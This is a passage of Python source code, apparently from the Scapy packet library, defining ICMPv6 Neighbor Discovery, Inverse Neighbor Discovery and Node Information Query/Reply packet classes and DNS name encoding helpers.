1882
1883
1884class TruncPktLenField(PacketLenField):
1885 def i2m(self, pkt, x):
1886 s = bytes(x)
1887 tmp_len = len(s)
1888 return s[:tmp_len - (tmp_len % 8)]
1889
1890 def i2len(self, pkt, i):
1891 return len(self.i2m(pkt, i))
1892
1893
1894class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
1895 name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
1896 fields_desc = [ByteField("type", 4),
1897 FieldLenField("len", None, length_of="pkt", fmt="B",
1898 adjust=lambda pkt, x: (x + 8) // 8),
1899 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
1900 TruncPktLenField("pkt", b"", IPv6,
1901 length_from=lambda pkt: 8 * pkt.len - 8)]
1902
1903# See which value should be used for default MTU instead of 1280
1904
1905
1906class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
1907 name = "ICMPv6 Neighbor Discovery Option - MTU"
1908 fields_desc = [ByteField("type", 5),
1909 ByteField("len", 1),
1910 XShortField("res", 0),
1911 IntField("mtu", 1280)]
1912
1913 def mysummary(self):
1914 return self.sprintf("%name% %mtu%")
1915
1916
1917class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
1918 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
1919 fields_desc = [ByteField("type", 6),
1920 ByteField("len", 1),
1921 ByteField("shortcutlim", 40), # XXX
1922 ByteField("res1", 0),
1923 IntField("res2", 0)]
1924
1925
1926class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
1927 name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
1928 fields_desc = [ByteField("type", 7),
1929 ByteField("len", 1),
1930 ShortField("res", 0),
1931 IntField("advint", 0)]
1932
1933 def mysummary(self):
1934 return self.sprintf("%name% %advint% milliseconds")
1935
1936
1937class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
1938 name = "ICMPv6 Neighbor Discovery - Home Agent Information"
1939 fields_desc = [ByteField("type", 8),
1940 ByteField("len", 1),
1941 ShortField("res", 0),
1942 ShortField("pref", 0),
1943 ShortField("lifetime", 1)]
1944
1945 def mysummary(self):
1946 return self.sprintf("%name% %pref% %lifetime% seconds")
1947
1948# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1949
1950# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1951
1952
1953class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1954 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
1955 fields_desc = [ByteField("type", 17),
1956 ByteField("len", 3),
1957 ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
1958 2: "New Care-Of Address",
1959 3: "NAR's IP address"}),
1960 ByteField("plen", 64),
1961 IntField("res", 0),
1962 IP6Field("addr", "::")]
1963
1964
1965class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1966 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501
1967 fields_desc = [ByteField("type", 18),
1968 ByteField("len", 3),
1969 ByteField("optcode", 0),
1970 ByteField("plen", 64),
1971 IntField("res", 0),
1972 IP6Field("prefix", "::")]
1973
1974
1975_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1976 1: "LLA for the new AP",
1977 2: "LLA of the MN",
1978 3: "LLA of the NAR",
1979 4: "LLA of the src of TrSolPr or PrRtAdv msg",
1980 5: "AP identified by LLA belongs to current iface of router", # noqa: E501
1981 6: "No preifx info available for AP identified by the LLA", # noqa: E501
1982 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501
1983
1984
1985class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
1986 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501
1987 fields_desc = [ByteField("type", 19),
1988 ByteField("len", 1),
1989 ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
1990 MACField("lla", ETHER_ANY)] # We only support ethernet
1991
1992
1993class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
1994 name = "ICMPv6 Neighbor Discovery - MAP Option"
1995 fields_desc = [ByteField("type", 23),
1996 ByteField("len", 3),
1997 BitField("dist", 1, 4),
1998 BitField("pref", 15, 4), # highest availability
1999 BitField("R", 1, 1),
2000 BitField("res", 0, 7),
2001 IntField("validlifetime", 0xffffffff),
2002 IP6Field("addr", "::")]
2003
2004
2005class _IP6PrefixField(IP6Field):
2006 __slots__ = ["length_from"]
2007
2008 def __init__(self, name, default):
2009 IP6Field.__init__(self, name, default)
2010 self.length_from = lambda pkt: 8 * (pkt.len - 1)
2011
2012 def addfield(self, pkt, s, val):
2013 return s + self.i2m(pkt, val)
2014
2015 def getfield(self, pkt, s):
2016 tmp_len = self.length_from(pkt)
2017 p = s[:tmp_len]
2018 if tmp_len < 16:
2019 p += b'\x00' * (16 - tmp_len)
2020 return s[tmp_len:], self.m2i(pkt, p)
2021
2022 def i2len(self, pkt, x):
2023 return len(self.i2m(pkt, x))
2024
2025 def i2m(self, pkt, x):
2026 tmp_len = pkt.len
2027
2028 if x is None:
2029 x = "::"
2030 if tmp_len is None:
2031 tmp_len = 1
2032 x = inet_pton(socket.AF_INET6, x)
2033
2034 if tmp_len is None:
2035 return x
2036 if tmp_len in [0, 1]:
2037 return b""
2038 if tmp_len in [2, 3]:
2039 return x[:8 * (tmp_len - 1)]
2040
2041 return x + b'\x00' * 8 * (tmp_len - 3)
2042
2043
2044class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
2045 name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
2046 fields_desc = [ByteField("type", 24),
2047 FieldLenField("len", None, length_of="prefix", fmt="B",
2048 adjust=lambda pkt, x: x // 8 + 1),
2049 ByteField("plen", None),
2050 BitField("res1", 0, 3),
2051 BitEnumField("prf", 0, 2, icmp6ndraprefs),
2052 BitField("res2", 0, 3),
2053 IntField("rtlifetime", 0xffffffff),
2054 _IP6PrefixField("prefix", None)]
2055
2056 def mysummary(self):
2057 return self.sprintf("%name% %prefix%/%plen% Preference %prf%")
2058
2059
2060class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
2061 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
2062 fields_desc = [ByteField("type", 25),
2063 FieldLenField("len", None, count_of="dns", fmt="B",
2064 adjust=lambda pkt, x: 2 * x + 1),
2065 ShortField("res", None),
2066 IntField("lifetime", 0xffffffff),
2067 IP6ListField("dns", [],
2068 length_from=lambda pkt: 8 * (pkt.len - 1))]
2069
2070 def mysummary(self):
2071 return self.sprintf("%name% ") + ", ".join(self.dns)
2072
2073
2074class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
2075 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
2076 fields_desc = [ByteField("type", 26),
2077 ByteField("len", 1),
2078 BitField("res", 0, 48)]
2079
2080# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2081# described in section 3.1 of RFC 1035
2082# XXX Label should be at most 63 octets in length : we do not enforce it
2083# Total length of domain should be 255 : we do not enforce it either
2084
2085
2086class DomainNameListField(StrLenField):
2087 __slots__ = ["padded"]
2088 islist = 1
2089 padded_unit = 8
2090
2091 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501
2092 self.padded = padded
2093 StrLenField.__init__(self, name, default, length_from=length_from)
2094
2095 def i2len(self, pkt, x):
2096 return len(self.i2m(pkt, x))
2097
2098 def i2h(self, pkt, x):
2099 if not x:
2100 return []
2101 return x
2102
2103 def m2i(self, pkt, x):
2104 x = plain_str(x) # Decode bytes to string
2105 res = []
2106 while x:
2107 # Get a name until \x00 is reached
2108 cur = []
2109 while x and ord(x[0]) != 0:
2110 tmp_len = ord(x[0])
2111 cur.append(x[1:tmp_len + 1])
2112 x = x[tmp_len + 1:]
2113 if self.padded:
2114 # Discard following \x00 in padded mode
2115 if len(cur):
2116 res.append(".".join(cur) + ".")
2117 else:
2118 # Store the current name
2119 res.append(".".join(cur) + ".")
2120 if x and ord(x[0]) == 0:
2121 x = x[1:]
2122 return res
2123
2124 def i2m(self, pkt, x):
2125 def conditionalTrailingDot(z):
2126 if z and orb(z[-1]) == 0:
2127 return z
2128 return z + b'\x00'
2129 # Build the encode names
2130 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501
2131 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp)
2132
2133 # In padded mode, add some \x00 bytes
2134 if self.padded and not len(ret_string) % self.padded_unit == 0:
2135 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501
2136
2137 return ret_string
2138
2139
2140class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
2141 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
2142 fields_desc = [ByteField("type", 31),
2143 FieldLenField("len", None, length_of="searchlist", fmt="B",
2144 adjust=lambda pkt, x: 1 + x // 8),
2145 ShortField("res", None),
2146 IntField("lifetime", 0xffffffff),
2147 DomainNameListField("searchlist", [],
2148 length_from=lambda pkt: 8 * pkt.len - 8,
2149 padded=True)
2150 ]
2151
2152 def mysummary(self):
2153 return self.sprintf("%name% ") + ", ".join(self.searchlist)
2154
2155
2156class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910
2157 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
2158 fields_desc = [ByteField("type", 37),
2159 FieldLenField("len", None, length_of="URI", fmt="B",
2160 adjust=lambda pkt, x: (2 + x) // 8),
2161 ICMPv6NDOptDataField("URI", "", strip_zeros=True,
2162 length_from=lambda pkt:
2163 8 * max(pkt.len, 1) - 2)]
2164
2165 def mysummary(self):
2166 return self.sprintf("%name% %URI%")
2167
2168
2169class _PREF64(IP6Field):
2170 def addfield(self, pkt, s, val):
2171 return s + self.i2m(pkt, val)[:12]
2172
2173 def getfield(self, pkt, s):
2174 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4)
2175
2176
2177class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781
2178 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
2179 fields_desc = [ByteField("type", 38),
2180 ByteField("len", 2),
2181 BitField("scaledlifetime", 0, 13),
2182 BitEnumField("plc", 0, 3,
2183 ["/96", "/64", "/56", "/48", "/40", "/32"]),
2184 _PREF64("prefix", "::")]
2185
2186 def mysummary(self):
2187 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]"
2188 return self.sprintf("%name% %prefix%") + plc
2189
2190# End of ICMPv6 Neighbor Discovery Options.
2191
2192
2193class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
2194 name = "ICMPv6 Neighbor Discovery - Router Solicitation"
2195 fields_desc = [ByteEnumField("type", 133, icmp6types),
2196 ByteField("code", 0),
2197 XShortField("cksum", None),
2198 IntField("res", 0)]
2199 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}
2200
2201
2202class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
2203 name = "ICMPv6 Neighbor Discovery - Router Advertisement"
2204 fields_desc = [ByteEnumField("type", 134, icmp6types),
2205 ByteField("code", 0),
2206 XShortField("cksum", None),
2207 ByteField("chlim", 0),
2208 BitField("M", 0, 1),
2209 BitField("O", 0, 1),
2210 BitField("H", 0, 1),
2211 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191
2212 BitField("P", 0, 1),
2213 BitField("res", 0, 2),
2214 ShortField("routerlifetime", 1800),
2215 IntField("reachabletime", 0),
2216 IntField("retranstimer", 0)]
2217 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2218
2219 def answers(self, other):
2220 return isinstance(other, ICMPv6ND_RS)
2221
2222 def mysummary(self):
2223 return self.sprintf("%name% Lifetime %routerlifetime% "
2224 "Hop Limit %chlim% Preference %prf% "
2225 "Managed %M% Other %O% Home %H%")
2226
2227
2228class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2229 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
2230 fields_desc = [ByteEnumField("type", 135, icmp6types),
2231 ByteField("code", 0),
2232 XShortField("cksum", None),
2233 IntField("res", 0),
2234 IP6Field("tgt", "::")]
2235 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2236
2237 def mysummary(self):
2238 return self.sprintf("%name% (tgt: %tgt%)")
2239
2240 def hashret(self):
2241 return bytes_encode(self.tgt) + self.payload.hashret()
2242
2243
2244class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2245 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
2246 fields_desc = [ByteEnumField("type", 136, icmp6types),
2247 ByteField("code", 0),
2248 XShortField("cksum", None),
2249 BitField("R", 1, 1),
2250 BitField("S", 0, 1),
2251 BitField("O", 1, 1),
2252 XBitField("res", 0, 29),
2253 IP6Field("tgt", "::")]
2254 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2255
2256 def mysummary(self):
2257 return self.sprintf("%name% (tgt: %tgt%)")
2258
2259 def hashret(self):
2260 return bytes_encode(self.tgt) + self.payload.hashret()
2261
2262 def answers(self, other):
2263 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
2264
2265# associated possible options : target link-layer option, Redirected header
2266
2267
2268class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
2269 name = "ICMPv6 Neighbor Discovery - Redirect"
2270 fields_desc = [ByteEnumField("type", 137, icmp6types),
2271 ByteField("code", 0),
2272 XShortField("cksum", None),
2273 XIntField("res", 0),
2274 IP6Field("tgt", "::"),
2275 IP6Field("dst", "::")]
2276 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2277
2278
2279# ICMPv6 Inverse Neighbor Discovery (RFC 3122) #
2280
2281class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
2282 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
2283 fields_desc = [ByteField("type", 9),
2284 FieldLenField("len", None, count_of="addrlist", fmt="B",
2285 adjust=lambda pkt, x: 2 * x + 1),
2286 StrFixedLenField("res", b"\x00" * 6, 6),
2287 IP6ListField("addrlist", [],
2288 length_from=lambda pkt: 8 * (pkt.len - 1))]
2289
2290
2291class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
2292 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2293 type = 10
2294
2295
2296# RFC3122
2297# Options requises : source lladdr et target lladdr
2298# Autres options valides : source address list, MTU
2299# - Comme precise dans le document, il serait bien de prendre l'adresse L2
2300# demandee dans l'option requise target lladdr et l'utiliser au niveau
2301# de l'adresse destination ethernet si aucune adresse n'est precisee
2302# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
2303# les options.
2304# Ether() must use the target lladdr as destination
2305class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
2306 name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
2307 fields_desc = [ByteEnumField("type", 141, icmp6types),
2308 ByteField("code", 0),
2309 XShortField("cksum", None),
2310 XIntField("reserved", 0)]
2311 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2312
2313# Options requises : target lladdr, target address list
2314# Autres options valides : MTU
2315
2316
2317class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
2318 name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
2319 fields_desc = [ByteEnumField("type", 142, icmp6types),
2320 ByteField("code", 0),
2321 XShortField("cksum", None),
2322 XIntField("reserved", 0)]
2323 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}
2324
2325
2326###############################################################################
2327# ICMPv6 Node Information Queries (RFC 4620)
2328###############################################################################
2329
2330# [ ] Add automatic destination address computation using computeNIGroupAddr
2331# in IPv6 class (Scapy6 modification when integrated) if :
2332# - it is not provided
2333# - upper layer is ICMPv6NIQueryName() with a valid value
2334# [ ] Try to be liberal in what we accept as internal values for _explicit_
2335# DNS elements provided by users. Any string should be considered
2336# valid and kept like it has been provided. At the moment, i2repr() will
2337# crash on many inputs
2338# [ ] Do the documentation
2339# [ ] Add regression tests
2340# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501
2341# [ ] Check if there are differences between different stacks. Among *BSD,
2342# with others.
2343# [ ] Deal with flags in a consistent way.
2344# [ ] Implement compression in names2dnsrepr() and decompresiion in
2345# dnsrepr2names(). Should be deactivable.
2346
2347icmp6_niqtypes = {0: "NOOP",
2348 2: "Node Name",
2349 3: "IPv6 Address",
2350 4: "IPv4 Address"}
2351
2352
2353class _ICMPv6NIHashret:
2354 def hashret(self):
2355 return bytes_encode(self.nonce)
2356
2357
2358class _ICMPv6NIAnswers:
2359 def answers(self, other):
2360 return self.nonce == other.nonce
2361
2362# Buggy; always returns the same value during a session
2363
2364
2365class NonceField(StrFixedLenField):
2366 def __init__(self, name, default=None):
2367 StrFixedLenField.__init__(self, name, default, 8)
2368 if default is None:
2369 self.default = self.randval()
2370
2371
2372@conf.commands.register
2373def computeNIGroupAddr(name):
2374 """Compute the NI group Address. Can take a FQDN as input parameter"""
2375 name = name.lower().split(".")[0]
2376 record = chr(len(name)) + name
2377 h = md5(record.encode("utf8"))
2378 h = h.digest()
2379 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
2380 return addr
2381
2382
2383# Here is the deal. First, that protocol is a piece of shit. Then, we
2384# provide 4 classes for the different kinds of Requests (one for every
2385# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2386# data field class that is made to be smart by guessing the specific
2387# type of value provided :
2388#
2389# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2390# if not overridden by user
2391# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
2392# if not overridden
2393# - Name in the other cases: code is set to 0, if not overridden by user
2394#
2395# Internal storage, is not only the value, but the a pair providing
2396# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
2397#
2398# Note : I merged getfield() and m2i(). m2i() should not be called
2399# directly anyway. Same remark for addfield() and i2m()
2400#
2401# -- arno
2402
2403# "The type of information present in the Data field of a query is
2404# declared by the ICMP Code, whereas the type of information in a
2405# Reply is determined by the Qtype"
2406
2407def names2dnsrepr(x):
2408 """
2409 Take as input a list of DNS names or a single DNS name
2410 and encode it in DNS format (with possible compression)
2411 If a string that is already a DNS name in DNS format
2412 is passed, it is returned unmodified. Result is a string.
2413 !!! At the moment, compression is not implemented !!!
2414 """
2415
2416 if isinstance(x, bytes):
2417 if x and x[-1:] == b'\x00': # stupid heuristic
2418 return x
2419 x = [x]
2420
2421 res = []
2422 for n in x:
2423 termin = b"\x00"
2424 if n.count(b'.') == 0: # single-component gets one more
2425 termin += b'\x00'
2426 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin
2427 res.append(n)
2428 return b"".join(res)
2429
2430
2431def dnsrepr2names(x):
2432 """
2433 Take as input a DNS encoded string (possibly compressed)
2434 and returns a list of DNS names contained in it.
2435 If provided string is already in printable format
2436 (does not end with a null character, a one element list
2437 is returned). Result is a list.
2438 """
2439 res = []
2440 cur = b""
2441 while x:
2442 tmp_len = orb(x[0])
2443 x = x[1:]
2444 if not tmp_len:
2445 if cur and cur[-1:] == b'.':
2446 cur = cur[:-1]
2447 res.append(cur)
2448 cur = b""
2449 if x and orb(x[0]) == 0: # single component
2450 x = x[1:]
2451 continue
2452 if tmp_len & 0xc0: # XXX TODO : work on that -- arno
2453 raise Exception("DNS message can't be compressed at this point!")
2454 cur += x[:tmp_len] + b"."
2455 x = x[tmp_len:]
2456 return res
2457
2458
2459class NIQueryDataField(StrField):
2460 def __init__(self, name, default):
2461 StrField.__init__(self, name, default)
2462
2463 def i2h(self, pkt, x):
2464 if x is None:
2465 return x
2466 t, val = x
2467 if t == 1:
2468 val = dnsrepr2names(val)[0]
2469 return val
2470
2471 def h2i(self, pkt, x):
2472 if x is tuple and isinstance(x[0], int):
2473 return x
2474
2475 # Try IPv6
2476 try:
2477 inet_pton(socket.AF_INET6, x.decode())
2478 return (0, x.decode())
2479 except Exception:
2480 pass
2481 # Try IPv4
2482 try:
2483 inet_pton(socket.AF_INET, x.decode())
2484 return (2, x.decode())
2485 except Exception:
2486 pass
2487 # Try DNS
2488 if x is None:
2489 x = b""
2490 x = names2dnsrepr(x)
2491 return (1, x)
2492
2493 def i2repr(self, pkt, x):
2494 t, val = x
2495 if t == 1: # DNS Name
2496 # we don't use dnsrepr2names() to deal with
2497 # possible weird data extracted info
2498 res = []
2499 while val:
2500 tmp_len = orb(val[0])
2501 val = val[1:]
2502 if tmp_len == 0:
2503 break
2504 res.append(plain_str(val[:tmp_len]) + ".")
2505 val = val[tmp_len:]
2506 tmp = "".join(res)
2507 if tmp and tmp[-1] == '.':
2508 tmp = tmp[:-1]
2509 return tmp
2510 return repr(val)
2511
2512 def getfield(self, pkt, s):
2513 qtype = getattr(pkt, "qtype")
2514 if qtype == 0: # NOOP
2515 return s, (0, b"")
2516 else:
2517 code = getattr(pkt, "code")
2518 if code == 0: # IPv6 Addr
2519 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
2520 elif code == 2: # IPv4 Addr
2521 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
2522 else: # Name or Unknown
2523 return b"", (1, s)
2524
2525 def addfield(self, pkt, s, val):
2526 if ((isinstance(val, tuple) and val[1] is None) or
2527 val is None):
2528 val = (1, b"")
2529 t = val[0]
2530 if t == 1:
2531 return s + val[1]
2532 elif t == 0:
2533 return s + inet_pton(socket.AF_INET6, val[1])
2534 else:
2535 return s + inet_pton(socket.AF_INET, val[1])
2536
2537
2538class NIQueryCodeField(ByteEnumField):
2539 def i2m(self, pkt, x):
2540 if x is None:
2541 d = pkt.getfieldval("data")
2542 if d is None:
2543 return 1
2544 elif d[0] == 0: # IPv6 address
2545 return 0
2546 elif d[0] == 1: # Name
2547 return 1
2548 elif d[0] == 2: # IPv4 address
2549 return 2
2550 else:
2551 return 1
2552 return x
2553
2554
2555_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
2556
2557# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
2558# 8: "Link-local addresses", 16: "Site-local addresses",
2559# 32: "Global addresses" }
2560
2561# "This NI type has no defined flags and never has a Data Field". Used
2562# to know if the destination is up and implements NI protocol.
2563
2564
2565class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
2566 name = "ICMPv6 Node Information Query - NOOP Query"
2567 fields_desc = [ByteEnumField("type", 139, icmp6types),
2568 NIQueryCodeField("code", None, _niquery_code),
2569 XShortField("cksum", None),
2570 ShortEnumField("qtype", 0, icmp6_niqtypes),
2571 BitField("unused", 0, 10),
2572 FlagsField("flags", 0, 6, "TACLSG"),
2573 NonceField("nonce", None),
2574 NIQueryDataField("data", None)]
2575
2576
2577class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
2578 name = "ICMPv6 Node Information Query - IPv6 Name Query"
2579 qtype = 2
2580
2581# We ask for the IPv6 address of the peer
2582
2583
2584class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
2585 name = "ICMPv6 Node Information Query - IPv6 Address Query"
2586 qtype = 3
2587 flags = 0x3E
2588
2589
2590class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
2591 name = "ICMPv6 Node Information Query - IPv4 Address Query"
2592 qtype = 4
2593
2594
2595_nireply_code = {0: "Successful Reply",
2596 1: "Response Refusal",
2597 3: "Unknown query type"}
2598
2599_nireply_flags = {1: "Reply set incomplete",
2600 2: "All unicast addresses",
2601 4: "IPv4 addresses",
2602 8: "Link-local addresses",
2603 16: "Site-local addresses",
2604 32: "Global addresses"}
2605
2606# Internal repr is one of those :
2607# (0, "some string") : unknown qtype value are mapped to that one
2608# (3, [ (ttl, ip6), ... ])
2609# (4, [ (ttl, ip4), ... ])
2610# (2, [ttl, dns_names]) : dns_names is one string that contains
2611# all the DNS names. Internally it is kept ready to be sent
2612# (undissected). i2repr() decode it for user. This is to
2613# make build after dissection bijective.
2614#
2615# I also merged getfield() and m2i(), and addfield() and i2m().
2616
2617
2618class NIReplyDataField(StrField):
2619
2620 def i2h(self, pkt, x):
2621 if x is None:
2622 return x
2623 t, val = x
2624 if t == 2:
2625 ttl, dnsnames = val
2626 val = [ttl] + dnsrepr2names(dnsnames)
2627 return val
2628
2629 def h2i(self, pkt, x):
2630 qtype = 0 # We will decode it as string if not
2631 # overridden through 'qtype' in pkt
2632
2633 # No user hint, let's use 'qtype' value for that purpose
2634 if not isinstance(x, tuple):
2635 if pkt is not None:
2636 qtype = pkt.qtype
2637 else:
2638 qtype = x[0]
2639 x = x[1]
2640
2641 # From that point on, x is the value (second element of the tuple)
2642
2643 if qtype == 2: # DNS name
2644 if isinstance(x, (str, bytes)): # listify the string
2645 x = [x]
2646 if isinstance(x, list):
2647 x = [val.encode() if isinstance(val, str) else val for val in x] # noqa: E501
2648 if x and isinstance(x[0], int):
2649 ttl = x[0]
2650 names = x[1:]
2651 else:
2652 ttl = 0
2653 names = x
2654 return (2, [ttl, names2dnsrepr(names)])
2655
2656 elif qtype in [3, 4]: # IPv4 or IPv6 addr
2657 if not isinstance(x, list):
2658 x = [x] # User directly provided an IP, instead of list
2659
2660 def fixvalue(x):
2661 # List elements are not tuples, user probably
2662 # omitted ttl value : we will use 0 instead
2663 if not isinstance(x, tuple):
2664 x = (0, x)
2665 # Decode bytes
2666 if isinstance(x[1], bytes):
2667 x = (x[0], x[1].decode())
2668 return x
2669
2670 return (qtype, [fixvalue(d) for d in x])
2671
2672 return (qtype, x)
2673
2674 def addfield(self, pkt, s, val):
2675 t, tmp = val
2676 if tmp is None:
2677 tmp = b""
2678 if t == 2:
2679 ttl, dnsstr = tmp
2680 return s + struct.pack("!I", ttl) + dnsstr
2681 elif t == 3:
2682 return s + b"".join(map(lambda x_y1: struct.pack("!I", x_y1[0]) + inet_pton(socket.AF_INET6, x_y1[1]), tmp)) # noqa: E501
2683 elif t == 4:
2684 return s + b"".join(map(lambda x_y2: struct.pack("!I", x_y2[0]) + inet_pton(socket.AF_INET, x_y2[1]), tmp)) # noqa: E501
2685 else:
2686 return s + tmp
2687
2688 def getfield(self, pkt, s):
2689 code = getattr(pkt, "code")
2690 if code != 0:
2691 return s, (0, b"")
2692
2693 qtype = getattr(pkt, "qtype")
2694 if qtype == 0: # NOOP
2695 return s, (0, b"")
2696
2697 elif qtype == 2:
2698 if len(s) < 4:
2699 return s, (0, b"")
2700 ttl = struct.unpack("!I", s[:4])[0]
2701 return b"", (2, [ttl, s[4:]])
2702
2703 elif qtype == 3: # IPv6 addresses with TTLs
2704 # XXX TODO : get the real length
2705 res = []
2706 while len(s) >= 20: # 4 + 16
2707 ttl = struct.unpack("!I", s[:4])[0]
2708 ip = inet_ntop(socket.AF_INET6, s[4:20])
2709 res.append((ttl, ip))
2710 s = s[20:]
2711 return s, (3, res)
2712
2713 elif qtype == 4: # IPv4 addresses with TTLs
2714 # XXX TODO : get the real length
2715 res = []
2716 while len(s) >= 8: # 4 + 4
2717 ttl = struct.unpack("!I", s[:4])[0]
2718 ip = inet_ntop(socket.AF_INET, s[4:8])
2719 res.append((ttl, ip))
2720 s = s[8:]
2721 return s, (4, res)
2722 else:
2723 # XXX TODO : implement me and deal with real length
2724 return b"", (0, s)
2725
2726 def i2repr(self, pkt, x):
2727 if x is None:
2728 return "[]"
2729
2730 if isinstance(x, tuple) and len(x) == 2:
2731 t, val = x
2732 if t == 2: # DNS names
2733 ttl, tmp_len = val
2734 tmp_len = dnsrepr2names(tmp_len)
2735 names_list = (plain_str(name) for name in tmp_len)
2736 return "ttl:%d %s" % (ttl, ",".join(names_list))
2737 elif t == 3 or t == 4:
2738 return "[ %s ]" % (", ".join(map(lambda x_y: "(%d, %s)" % (x_y[0], x_y[1]), val))) # noqa: E501
2739 return repr(val)
2740 return repr(x) # XXX should not happen
2741
2742# By default, sent responses have code set to 0 (successful)
2743
2744
2745class ICMPv6NIReplyNOOP(_ICMPv6NIAnswers, _ICMPv6NIHashret, _ICMPv6):
2746 name = "ICMPv6 Node Information Reply - NOOP Reply"
2747 fields_desc = [ByteEnumField("type", 140, icmp6types),
2748 ByteEnumField("code", 0, _nireply_code),
2749 XShortField("cksum", None),
2750 ShortEnumField("qtype", 0, icmp6_niqtypes),
2751 BitField("unused", 0, 10),
2752 FlagsField("flags", 0, 6, "TACLSG"),
2753 NonceField("nonce", None),
2754 NIReplyDataField("data", None)]
2755
2756
2757class ICMPv6NIReplyName(ICMPv6NIReplyNOOP):
2758 name = "ICMPv6 Node Information Reply - Node Names"
2759 qtype = 2
2760
2761
2762class ICMPv6NIReplyIPv6(ICMPv6NIReplyNOOP):
2763 name = "ICMPv6 Node Information Reply - IPv6 addresses"
2764 qtype = 3
2765
2766
2767class ICMPv6NIReplyIPv4(ICMPv6NIReplyNOOP):
